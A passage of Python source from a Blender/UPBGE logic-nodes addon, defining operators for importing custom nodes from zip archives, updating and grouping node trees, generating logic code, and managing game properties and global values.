'{}_{}.{}'.format(name_part, index, ext_part)\n path = os.path.join(output_dir, name)\n index += 1\n if index > 100:\n raise RuntimeError(\n \"Can't find a unique name for {}\".format(file_name)\n )\n return path\n\n def _zipextract(self, zip, entry_name, output_dir):\n import shutil\n with zip.open(entry_name) as entry:\n out_file = self._generate_unique_filename(\n output_dir, self._entry_filename(entry_name)\n )\n with open(out_file, \"wb\") as f:\n shutil.copyfileobj(entry, f)\n\n def execute(self, context):\n import zipfile\n if not self.filepath:\n return {\"FINISHED\"}\n\n if not self.filepath.endswith(\".zip\"):\n return {\"FINISHED\"}\n\n if not zipfile.is_zipfile(self.filepath):\n return {\"FINISHED\"}\n\n with zipfile.ZipFile(self.filepath, \"r\") as f:\n entries = f.namelist()\n cells = [\n x for x in entries if x.startswith(\"bgelogic/cells/\") and\n x.endswith(\".py\")\n ]\n nodes = [\n x for x in entries if x.startswith(\"bgelogic/nodes/\") and\n x.endswith(\".py\")\n ]\n if cells or nodes:\n local_cells_folder, local_nodes_folder = (\n self._create_directories()\n )\n for cell in cells:\n self._zipextract(f, cell, local_cells_folder)\n for node in nodes:\n self._zipextract(f, node, local_nodes_folder)\n _do_load_project_nodes(context)\n return {\"FINISHED\"}\n\n def invoke(self, context, event):\n self.filepath = \"\"\n context.window_manager.fileselect_add(self)\n return {\"RUNNING_MODAL\"}\n\n\ndef _do_load_project_nodes(context):\n utils.notify(\"Loading project nodes and cells...\")\n current_file = context.blend_data.filepath\n file_dir = os.path.dirname(current_file)\n netlogic_dir = os.path.join(file_dir, \"bgelogic\")\n # cells_dir = os.path.join(netlogic_dir, \"cells\")\n nodes_dir = os.path.join(netlogic_dir, \"nodes\")\n if os.path.exists(nodes_dir):\n bge_netlogic.remove_project_user_nodes()\n bge_netlogic.load_nodes_from(nodes_dir)\n\n\nclass NLLoadProjectNodes(bpy.types.Operator):\n bl_idname = \"bge_netlogic.load_nodes\"\n bl_label = \"Reload Project Nodes\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Reload the custom nodes' definitions.\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n _do_load_project_nodes(context)\n return {\"FINISHED\"}\n\n\nclass NLSelectTreeByNameOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.select_tree_by_name\"\n bl_label = \"Edit\"\n bl_description = \"Edit\"\n tree_name: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n assert self.tree_name is not None\n assert len(self.tree_name) > 0\n blt_groups = [\n g for g in bpy.data.node_groups if (\n g.name == self.tree_name\n ) and (\n g.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname\n )\n ]\n if len(blt_groups) != 1:\n utils.error(\"Something went wrong here...\")\n for t in blt_groups:\n context.space_data.node_tree = t\n return {'FINISHED'}\n\n\nclass NLRemoveTreeByNameOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.remove_tree_by_name\"\n bl_label = \"Remove\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Remove the tree from the selected objects\"\n tree_name: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n import bge_netlogic.utilities as tools\n stripped_tree_name = tools.strip_tree_name(self.tree_name)\n py_module_name = tools.py_module_name_for_stripped_tree_name(\n stripped_tree_name\n )\n py_module_name = py_module_name.split('NL')[-1]\n objs = [\n ob for ob in context.scene.objects if ob.select_get() and\n tools.object_has_treeitem_for_treename(\n ob, self.tree_name\n )\n ]\n for ob in objs:\n tree_name = utils.make_valid_name(self.tree_name)\n module = f'nl_{tree_name.lower()}'\n gs = ob.game\n idx = 0\n for c in gs.components:\n if c.module == module:\n bpy.ops.logic.python_component_remove(index=idx)\n idx += 1\n controllers = [\n c for c in gs.controllers if py_module_name in c.name\n ]\n actuators = [\n a for a in gs.actuators if py_module_name in a.name\n ]\n sensors = [\n s for s in gs.sensors if py_module_name in s.name\n ]\n for s in sensors:\n bpy.ops.logic.sensor_remove(sensor=s.name, object=ob.name)\n for c in controllers:\n bpy.ops.logic.controller_remove(\n controller=c.name, object=ob.name\n )\n for a in actuators:\n bpy.ops.logic.actuator_remove(actuator=a.name, object=ob.name)\n\n bge_netlogic.utilities.remove_tree_item_from_object(\n ob, self.tree_name\n )\n bge_netlogic.utilities.remove_network_initial_status_key(\n ob, self.tree_name\n )\n utils.success(\"Successfully removed tree {} from object {}.\".format(\n self.tree_name,\n ob.name\n ))\n return {'FINISHED'}\n\n def remove_tree_from_object_pcoll(self, ob, treename):\n index = None\n i = 0\n for item in ob.bgelogic_treelist:\n if item.tree_name == treename:\n index = i\n break\n i += 1\n if index is not None:\n ob.bgelogic_treelist.remove(index)\n\n\nclass NLUpdateTreeVersionOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.update_tree_version\"\n bl_label = \"Update Trees\"\n bl_description = \"Update trees to the current version of the Addon\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n cases = {\n 'NLConditionLogicOperation': self.update_compare_node,\n 'NLActionRayCastNode': self.update_ray_node,\n 'NLActionStart3DSoundAdv': self.update_3dsound_node,\n 'NLActionStartSound': self.update_sound_node,\n 'NLActionGetCharacterInfo': self.update_charinfo_node,\n 'NLConditionCollisionNode': self.update_collision_node,\n 'NLParameterTypeCast': self.update_typecast_node\n }\n for tree in bpy.data.node_groups:\n if tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname:\n for node in tree.nodes:\n f = cases.get(node.bl_idname, None)\n if f:\n f(tree, node)\n return {'FINISHED'}\n\n def restore_input(self, tree, node, replacer, idx, new_idx=None):\n if new_idx is None:\n new_idx = idx\n ipt = node.inputs[idx]\n new_ipt = replacer.inputs[new_idx]\n for attr in NODE_ATTRS:\n if attr == 'label':\n continue\n if hasattr(ipt, attr):\n setattr(new_ipt, attr, getattr(ipt, attr))\n if ipt.is_linked:\n for link in ipt.links:\n tree.links.new(link.from_socket, new_ipt)\n\n def restore_output(self, tree, node, replacer, idx, new_idx=None):\n if new_idx is None:\n new_idx = idx\n opt = node.outputs[idx]\n new_opt = replacer.outputs[new_idx]\n if opt.is_linked:\n for link in opt.links:\n tree.links.new(new_opt, link.to_socket)\n\n def restore_inputs(self, tree, node, replacer, start=0, scope=0, offset=0):\n if scope == 0:\n scope = len(node.inputs) - 1\n for idx in range(scope):\n i = node.inputs[idx+start]\n for attr in NODE_ATTRS:\n if attr == 'label':\n continue\n if hasattr(i, attr):\n setattr(replacer.inputs[idx+offset], attr, getattr(i, attr))\n if i.is_linked:\n for link in i.links:\n tree.links.new(\n link.from_socket,\n replacer.inputs[idx+offset]\n )\n\n def restore_outputs(self, tree, node, replacer, start=0, scope=0, offset=0):\n if scope == 0:\n scope = len(node.outputs) - 1\n for idx in range(scope):\n o = node.outputs[idx+start]\n if o.is_linked:\n for link in o.links:\n tree.links.new(\n replacer.outputs[idx+offset],\n link.from_socket\n )\n\n def update_typecast_node(self, tree, node):\n if node.inputs[0].bl_idname == 'NLTypeCastSocket':\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_input(tree, node, replacer, 0, 1)\n self.restore_input(tree, node, replacer, 1, 0)\n self.restore_outputs(tree, node, replacer)\n tree.nodes.remove(node)\n\n def update_collision_node(self, tree, node):\n if len(node.inputs) == 2:\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_input(tree, node, replacer, 0)\n self.restore_input(tree, node, replacer, 1, 2)\n self.restore_outputs(tree, node, replacer)\n replacer.update_draw()\n tree.nodes.remove(node)\n\n def update_charinfo_node(self, tree, node):\n if len(node.inputs) > 1:\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_input(tree, node, replacer, 1, 0)\n self.restore_outputs(tree, node, replacer)\n tree.nodes.remove(node)\n\n def update_ray_node(self, tree, node):\n if len(node.inputs) < 8:\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_inputs(tree, node, replacer, 0, 3)\n self.restore_inputs(tree, node, replacer, 4, 2)\n self.restore_input(tree, node, replacer, 6, 7)\n self.restore_outputs(tree, node, replacer)\n tree.nodes.remove(node)\n\n def update_sound_node(self, tree, node):\n if len(node.outputs) < 3:\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_inputs(tree, node, replacer)\n self.restore_output(tree, node, replacer, 0)\n self.restore_output(tree, node, replacer, 1, 2)\n tree.nodes.remove(node)\n\n def update_3dsound_node(self, tree, node):\n if node.inputs[5].bl_idname != 'NLSocketAlphaFloat':\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_inputs(tree, node, replacer, scope=4)\n self.restore_inputs(\n tree,\n node,\n replacer,\n scope=6,\n start=7,\n offset=8\n )\n self.restore_output(tree, node, replacer, 0)\n self.restore_output(tree, node, replacer, 1, 2)\n tree.nodes.remove(node)\n elif len(node.outputs) < 3:\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_inputs(tree, node, replacer)\n self.restore_output(tree, node, replacer, 0)\n self.restore_output(tree, node, replacer, 1, 2)\n tree.nodes.remove(node)\n\n def update_compare_node(self, tree, node):\n if node.inputs[0].bl_idname != 'NLPositiveFloatSocket':\n return\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n replacer.operator = node.operator\n replacer.inputs[0].value_type = node.inputs[1].value_type\n replacer.inputs[0].value = node.inputs[1].value\n replacer.inputs[1].value_type = node.inputs[2].value_type\n replacer.inputs[1].value = node.inputs[2].value\n\n if node.inputs[0].is_linked:\n link = node.inputs[0].links[0]\n tree.links.new(\n link.from_socket,\n replacer.inputs[2]\n )\n if node.inputs[1].is_linked:\n link = node.inputs[1].links[0]\n tree.links.new(\n link.from_socket,\n replacer.inputs[0]\n )\n if node.inputs[2].is_linked:\n link = node.inputs[2].links[0]\n tree.links.new(\n link.from_socket,\n replacer.inputs[1]\n )\n self.restore_outputs(tree, node, replacer)\n tree.nodes.remove(node)\n\n\nclass NLMakeGroupOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.make_group\"\n bl_label = \"Pack Into New Tree\"\n bl_description = \"Convert selected Nodes to a new tree. Will be applied to selected object.\\nWARNING: All Nodes connected to selection must be selected too\"\n bl_options = {'REGISTER', 'UNDO'}\n owner: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def _index_of(self, item, a_iterable):\n i = 0\n for e in a_iterable:\n if e == item:\n return i\n i += 1\n\n def group_make(self, group_name, add_nodes):\n node_tree = bpy.data.node_groups.new(group_name, 'BGELogicTree')\n group_name = node_tree.name\n\n nodes = node_tree.nodes\n new_nodes = {}\n parent_tree = bpy.context.space_data.edit_tree\n locs = []\n\n for node in add_nodes:\n added_node = nodes.new(node.bl_idname)\n added_node.location = node.location\n new_nodes[node] = added_node\n\n for old_node in new_nodes:\n new_node = new_nodes[old_node]\n for attr in dir(old_node):\n if attr in NODE_ATTRS:\n setattr(new_node, attr, getattr(old_node, attr))\n for socket in old_node.outputs:\n for link in socket.links:\n to_node = link.to_node\n if to_node not in add_nodes:\n msg = 'Some linked Nodes are not selected!'\n self.report({\"ERROR\"}, msg)\n utils.error(msg)\n return None\n for socket in old_node.inputs:\n index = self._index_of(socket, old_node.inputs)\n for attr in dir(socket):\n if attr in NODE_ATTRS or attr.startswith('slot_'):\n try:\n if attr != 'label':\n setattr(new_node.inputs[index], attr, getattr(socket, attr))\n except Exception:\n utils.warn('Attribute {} not writable.'.format(attr))\n for link in socket.links:\n try:\n output_socket = link.from_socket\n output_node = new_nodes[output_socket.node]\n outdex = self._index_of(output_socket, output_socket.node.outputs)\n node_tree.links.new(new_node.inputs[index], output_node.outputs[outdex])\n except Exception:\n bpy.data.node_groups.remove(node_tree)\n msg = 'Some linked Nodes are not selected! Aborting...'\n self.report({\"ERROR\"}, msg)\n utils.error(msg)\n return None\n locs.append(old_node.location)\n\n for old_node in new_nodes:\n parent_tree.nodes.remove(old_node)\n redir = parent_tree.nodes.new('NLActionExecuteNetwork')\n redir.inputs[0].value = True\n\n try:\n redir.inputs[1].value = bpy.context.object\n except Exception:\n msg = 'No Object was selected; Set Object in tree {} manually!'.format(parent_tree.name)\n self.report({\"WARNING\"}, msg)\n utils.warn(msg)\n redir.inputs[2].value = bpy.data.node_groups[group_name]\n redir.location = self.avg_location(locs)\n node_tree.use_fake_user = True\n utils.success(f'Created Node Tree {group_name}.')\n return node_tree\n\n def avg_location(self, locs):\n avg_x = 0\n avg_y = 0\n for v in locs:\n avg_x += v[0]\n avg_y += v[1]\n avg_x /= len(locs)\n avg_y /= len(locs)\n return (avg_x, avg_y)\n\n def execute(self, context):\n utils.debug('Packing Group...')\n nodes_to_group = []\n tree = context.space_data.edit_tree\n\n if tree is None:\n utils.error('Could not pack group! Aborting...')\n return {'FINISHED'}\n for node in tree.nodes:\n if node.select:\n nodes_to_group.append(node)\n if len(nodes_to_group) > 0:\n name = bpy.context.scene.nl_group_name.name\n if self.group_make(name, nodes_to_group):\n bge_netlogic._update_all_logic_tree_code()\n return {'FINISHED'}\n\n\nclass NLAdd4KeyTemplateOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_4_key_temp\"\n bl_label = \"4 Key Movement\"\n bl_description = \"Add 4 Key Movement (WASD with normalized vector)\"\n bl_options = {'REGISTER', 'UNDO'}\n nl_template_name = '4keymovement'\n owner: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'edit_tree'):\n return False\n tree = context.space_data.edit_tree\n if not tree:\n return False\n if not (tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname):\n return False\n elif tree:\n return True\n return False\n\n def add_node(self, x, y, name, node_type, node_list, links=[], values=[]):\n tree = bpy.context.space_data.edit_tree\n\n node = tree.nodes.new(node_type)\n node.label = name\n node.location = (x, y)\n node_list.append(node)\n # value looks like this: [input_index or attribute, value_type, value]\n for value in values:\n index = value['index']\n val_type = value.get('type', 'value')\n val = value['value']\n if isinstance(index, int):\n setattr(node.inputs[index], val_type, val)\n else:\n setattr(node, index, val)\n return node\n\n def link_node(self, node, links, node_list):\n tree = bpy.context.space_data.edit_tree\n # link looks like this: [from_node, outlink, inlink]\n for link in links:\n from_node = node_list[link[0]]\n outsocket = from_node.outputs[link[1]]\n insocket = node.inputs[link[2]]\n tree.links.new(\n outsocket,\n insocket\n )\n\n def get_template_path(self):\n addon_path = ''.join(bpy.utils.script_paths(subdir='addons', user_pref=False, check_all=False, use_user=False))\n addon_path = os.path.join(addon_path, 'bge_netlogic')\n addon_path = addon_path if os.path.exists(addon_path) else os.path.join(bpy.utils.user_resource('SCRIPTS', path=\"addons\"), 'bge_netlogic')\n return os.path.join(\n addon_path,\n 'templates',\n 'prefabs',\n self.nl_template_name + '.json'\n )\n\n def execute(self, context):\n utils.debug('Adding template...')\n tree = context.space_data.edit_tree\n jf = json.load(open(self.get_template_path()))\n content = jf['nodes']\n\n if tree is None:\n utils.error('Cannot add template! Aborting...')\n return {'FINISHED'}\n for node in tree.nodes:\n node.select = False\n\n nodes = []\n for c in content:\n self.add_node(\n c['x'],\n c['y'],\n c['label'],\n c['node_type'],\n nodes,\n values=c['values']\n )\n i = 0\n for c in content:\n self.link_node(nodes[i], c['links'], nodes)\n i += 1\n\n for node in nodes:\n node.select = True\n if node.label == 'Speed':\n continue\n node.hide = True\n for socket in node.inputs:\n if not socket.is_linked:\n socket.hide = True\n for socket in node.outputs:\n if not socket.is_linked:\n socket.hide = True\n\n bpy.ops.transform.translate()\n utils.success('Added 4 Key Template.')\n return {'FINISHED'}\n\n\nclass NLApplyLogicOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.apply_logic\"\n bl_label = \"Apply Logic\"\n bl_description = \"Apply the current tree to the selected objects.\"\n bl_options = {'REGISTER', 'UNDO'}\n owner: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'edit_tree'):\n return False\n tree = context.space_data.edit_tree\n if not tree:\n return False\n if not (tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname):\n return False\n scene = context.scene\n for ob in scene.objects:\n if ob.select_get():\n return True\n return False\n\n def execute(self, context):\n current_scene = context.scene\n tree = context.space_data.edit_tree\n tree.use_fake_user = True\n py_module_name = bge_netlogic.utilities.py_module_name_for_tree(tree)\n selected_objects = [\n ob for ob in current_scene.objects if ob.select_get()\n ]\n initial_status = bge_netlogic.utilities.compute_initial_status_of_tree(\n tree.name, selected_objects\n )\n try:\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n except Exception as e:\n utils.error(f\"Couldn't compile tree {tree.name}!\")\n print(e)\n initial_status = True if initial_status is None else False\n for obj in selected_objects:\n utils.success(\n \"Applied tree {} to object {}.\".format(\n tree.name,\n obj.name\n )\n )\n if tree.mode:\n tree_name = utils.make_valid_name(tree.name)\n module = f'nl_{tree_name.lower()}'\n name = f'{module}.{tree_name}'\n comps = [c.module for c in obj.game.components]\n if module not in comps:\n bpy.ops.logic.python_component_register(component_name=name)\n else:\n self._setup_logic_bricks_for_object(\n tree, py_module_name, obj, context\n )\n tree_collection = obj.bgelogic_treelist\n contains = False\n for t in tree_collection:\n if t.tree_name == tree.name:\n contains = True\n break\n if not contains:\n new_entry = tree_collection.add()\n new_entry.tree_name = tree.name\n new_entry.tree = tree\n # this will set both new_entry.tree_initial_status and add a\n # game property that makes the status usable at runtime\n bge_netlogic.utilities.set_network_initial_status_key(\n obj, tree.name, initial_status\n )\n return {'FINISHED'}\n\n def _setup_logic_bricks_for_object(\n self,\n tree,\n py_module_name,\n obj,\n context\n ):\n game_settings = obj.game\n disp_name = py_module_name\n disp_name = disp_name.split('NL')[-1] + '_NL'\n sensor_name = disp_name\n sensor = None\n for s in game_settings.sensors:\n if s.name == sensor_name:\n sensor = s\n break\n if sensor is None:\n bpy.ops.logic.sensor_add(\n type=\"ALWAYS\",\n object=obj.name\n )\n sensor = game_settings.sensors[-1]\n sensor.show_expanded = False\n sensor.pin = True\n sensor.use_pulse_true_level = True\n sensor.name = sensor_name\n # create the controller\n controller_name = disp_name + '_PY'\n controller = None\n for c in game_settings.controllers:\n if c.name == controller_name:\n controller = c\n break\n if controller is None:\n bpy.ops.logic.controller_add(\n type=\"PYTHON\",\n object=obj.name\n )\n controller = game_settings.controllers[-1]\n controller.show_expanded = False\n # if 'NL_OR' not in game_settings.controllers:\n # bpy.ops.logic.controller_add(\n # type=\"LOGIC_OR\",\n # object=obj.name,\n # name='NL_OR'\n # )\n # game_settings.controllers[-1].show_expanded = False\n controller.name = controller_name\n controller.type = \"PYTHON\"\n controller.mode = \"MODULE\"\n controller.module = bge_netlogic.utilities.py_controller_module_string(\n py_module_name\n )\n # link the brick\n sensor.link(controller)\n\n\nclass NLGenerateLogicNetworkOperatorAll(bpy.types.Operator):\n bl_idname = \"bge_netlogic.generate_logicnetwork_all\"\n bl_label = \"Generate LogicNetwork\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Create the code needed to execute all logic trees\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def __init__(self):\n pass\n\n def _create_external_text_buffer(self, context, buffer_name):\n file_path = bpy.path.abspath(\"//{}\".format(buffer_name))\n return FileTextBuffer(file_path)\n\n def _create_text_buffer(self, context, buffer_name, external=False):\n if external is True:\n return self._create_external_text_buffer(context, buffer_name)\n blender_text_data_index = bpy.data.texts.find(buffer_name)\n blender_text_data = None\n if blender_text_data_index < 0:\n blender_text_data = bpy.data.texts.new(name=buffer_name)\n else:\n blender_text_data = bpy.data.texts[blender_text_data_index]\n return BLTextBuffer(blender_text_data)\n\n def execute(self, context):\n # ensure that the local \"bgelogic\" folder exists\n local_bgelogic_folder = bpy.path.abspath(\"//bgelogic\")\n if not os.path.exists(local_bgelogic_folder):\n try:\n os.mkdir(local_bgelogic_folder)\n except PermissionError:\n self.report(\n {\"ERROR\"},\n \"Cannot generate the code because the blender file has \"\n \"not been saved or the user has no write permission for \"\n \"the containing folder.\"\n )\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n for tree in bpy.data.node_groups:\n if tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname:\n try:\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n except Exception as e:\n utils.error(f\"Couldn't compile tree {tree.name}!\")\n utils.error(e)\n utils.set_compile_status(utils.TREE_COMPILED_ALL)\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n return {\"FINISHED\"}\n\n\nclass NLGenerateLogicNetworkOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.generate_logicnetwork\"\n bl_label = \"Generate LogicNetwork\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Create the code needed to execute the current logic tree\"\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'edit_tree'):\n return False\n tree = context.space_data.edit_tree\n if utils.TREE_COMPILED in context.scene.logic_node_settings.tree_compiled:\n return False\n if not tree:\n return False\n if not (tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname):\n return False\n return context.space_data.edit_tree is not None\n\n def __init__(self):\n pass\n\n def _create_external_text_buffer(self, context, buffer_name):\n file_path = bpy.path.abspath(\"//{}\".format(buffer_name))\n return FileTextBuffer(file_path)\n\n def _create_text_buffer(self, context, buffer_name, external=False):\n if external is True:\n return self._create_external_text_buffer(context, buffer_name)\n blender_text_data_index = bpy.data.texts.find(buffer_name)\n blender_text_data = None\n if blender_text_data_index < 0:\n blender_text_data = bpy.data.texts.new(name=buffer_name)\n else:\n blender_text_data = bpy.data.texts[blender_text_data_index]\n return BLTextBuffer(blender_text_data)\n\n def execute(self, context):\n # ensure that the local \"bgelogic\" folder exists\n local_bgelogic_folder = bpy.path.abspath(\"//bgelogic\")\n if not os.path.exists(local_bgelogic_folder):\n try:\n os.mkdir(local_bgelogic_folder)\n except PermissionError:\n self.report(\n {\"ERROR\"},\n \"Cannot generate the code because the blender file has \"\n \"not been saved or the user has no write permission for \"\n \"the containing folder.\"\n )\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n # write the current tree in a python module,\n # in the directory of the current blender file\n context = bpy.context\n try:\n tree = context.space_data.edit_tree\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n except Exception as e:\n utils.error(e)\n utils.warn('Automatic Update failed, attempting hard generation...')\n if getattr(bpy.context.scene.logic_node_settings, 'use_generate_all', False):\n self.report(\n {'ERROR'},\n 'Tree to edit not found! Updating All Trees.'\n )\n for tree in bpy.data.node_groups:\n if tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname:\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n else:\n self.report(\n {'ERROR'},\n 'Tree to edit not found! Aborting.'\n )\n utils.error('Tree to edit not found! Aborting.')\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n utils.set_compile_status(utils.TREE_COMPILED)\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n return {\"FINISHED\"}\n\n\nclass NLAddGlobalOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_global\"\n bl_label = \"Add Global Value\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Add a value accessible from anywhere\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n category = utils.get_global_category()\n prop = category.content.add()\n prop.name = 'prop'\n prop.string_val = ''\n prop.float_val = 0.0\n prop.int_val = 0\n prop.bool_val = False\n prop.filepath_val = ''\n category.selected = len(category.content) - 1\n\n return {'FINISHED'}\n\n\nclass NLRemoveGlobalOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.remove_global\"\n bl_label = \"Remove Global Value\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Remove a value accessible from anywhere\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n category = utils.get_global_category()\n category.content.remove(category.selected)\n if category.selected > len(category.content) - 1:\n category.selected = len(category.content) - 1\n return {'FINISHED'}\n\n\nclass NLAddGlobalCatOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_global_cat\"\n bl_label = \"Add Global Category\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Add a global value category\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n scene = context.scene\n cats = scene.nl_global_categories\n cat = cats.add()\n cat.name = 'category'\n scene.nl_global_cat_selected = len(scene.nl_global_categories) - 1\n\n return {'FINISHED'}\n\n\nclass NLRemoveGlobalCatOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.remove_global_cat\"\n bl_label = \"Remove Global Category\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Remove a global value category\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n scene = context.scene\n scene.nl_global_categories.remove(scene.nl_global_cat_selected)\n if scene.nl_global_cat_selected > len(scene.nl_global_categories) - 1:\n scene.nl_global_cat_selected = len(scene.nl_global_categories) - 1\n return {'FINISHED'}\n\n\nclass NLLoadSoundOperator(bpy.types.Operator, ImportHelper):\n bl_idname = \"bge_netlogic.load_sound\"\n bl_label = \"Load Sound\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Load a sound file\"\n\n filter_glob: bpy.props.StringProperty(\n default='*.wav;*.mp3;*.ogg*',\n options={'HIDDEN'}\n )\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.sound.open_mono(\n filepath=self.filepath,\n mono=True,\n relative_path=True,\n filter_sound=True\n )\n return {'FINISHED'}\n\n\nclass NLLoadImageOperator(bpy.types.Operator, ImportHelper):\n bl_idname = \"bge_netlogic.load_image\"\n bl_label = \"Load Image\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Load an image file\"\n\n filter_glob: bpy.props.StringProperty(\n default='*.jpg;*.png;*.jpeg;*.JPEG;',\n options={'HIDDEN'}\n )\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.image.open(\n filepath=self.filepath,\n relative_path=True,\n filter_image=True\n )\n # .value = os.path.basename(self.filepath)\n return {'FINISHED'}\n\n\nclass NLAddPropertyOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_game_prop\"\n bl_label = \"Add Game Property\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Adds a property available to the UPBGE\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.object.game_property_new()\n print(context)\n bge_netlogic.update_current_tree_code()\n return {'FINISHED'}\n\n\nclass NLAddComponentOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_component\"\n bl_label = \"Add Component\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Add a python Component to the selected object.\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.logic.python_component_register()\n bge_netlogic.update_current_tree_code()\n return {'FINISHED'}\n\n\nclass NLRemovePropertyOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.remove_game_prop\"\n bl_label = \"Add Game Property\"\n bl_description = \"Remove this property\"\n bl_options = {'REGISTER', 'UNDO'}\n index: bpy.props.IntProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.object.game_property_remove(index=self.index)\n bge_netlogic.update_current_tree_code()\n return {'FINISHED'}\n\n\nclass NLMovePropertyOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.move_game_prop\"\n bl_label = \"Move Game Property\"\n bl_description = \"Move Game Property\"\n bl_options = {'REGISTER', 'UNDO'}\n index: bpy.props.IntProperty()\n direction: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.object.game_property_move(\n index=self.index,\n direction=self.direction\n )\n bge_netlogic.update_current_tree_code()\n return {'FINISHED'}\n\n\nclass NLRefreshNodeCode(bpy.types.Operator):\n bl_idname = \"bge_netlogic.refresh_node_code\"\n bl_label = \"Refresh Nodes\"\n bl_description = \"Update the node package installed in UPBGE python\"\n bl_options = {'REGISTER', 'UNDO'}\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.object.game_property_move(\n index=self.index,\n direction=self.direction\n )\n bge_netlogic.update_current_tree_code()\n return {'FINISHED'}\n\n\nclass NLSwitchInitialNetworkStatusOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.switch_network_status\"\n bl_label = \"Enable/Disable at start\"\n bl_description = \"Enables of disables the logic tree at start for the \\\n selected objects\"\n bl_options = {'REGISTER', 'UNDO'}\n tree_name: bpy.props.StringProperty()\n current_status: bpy.props.BoolProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n current_status = self.current_status\n new_status = not current_status\n tree_name = self.tree_name\n scene = context.scene\n updated_objects = [\n ob for ob in scene.objects if ob.select_get() and\n bge_netlogic.utilities.object_has_treeitem_for_treename(\n ob, tree_name\n )\n ]\n for ob in updated_objects:\n bge_netlogic.utilities.set_network_initial_status_key(\n ob, tree_name, new_status\n )\n bge_netlogic.update_current_tree_code()\n return {'FINISHED'}\n\n\n# Popup the code templates for custom nodes and cells\nclass 